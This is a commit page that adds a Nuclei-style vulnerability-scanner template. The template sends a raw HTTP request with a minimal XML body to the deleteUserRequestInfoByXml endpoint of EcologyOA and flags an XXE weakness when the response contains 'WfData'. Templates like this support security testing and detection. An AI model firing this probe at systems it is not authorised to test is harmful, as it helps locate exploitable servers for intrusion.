Skip to content

Commit

Permalink
ecology-oa-byxml-xxe
Browse files Browse the repository at this point in the history
  • Loading branch information
unknown committed Jul 12, 2023
1 parent 8f02089 commit d2df870
Showing 1 changed file with 25 additions and 0 deletions.
25 changes: 25 additions & 0 deletions ecology-oa/ecology-oa-byxml-xxe.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: ecology-oa-byxml-xxe

info:
name: EcologyOA deleteUserRequestInfoByXml - XXE
author: unknown
severity: high
description: EcologyOA deleteUserRequestInfoByXml interface has XXE
tags: ecology-oa,xxe

requests:
- raw:
- |
GET /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: {{Hostname}}
Content-Length: 35
Content-Type: application/xml
Accept-Encoding: gzip
<?xml version="1.0"?>
<!DOCTYPE>
matchers:
- type: word
words:
- 'WfData'

0 comments on commit d2df870

Please sign in to comment.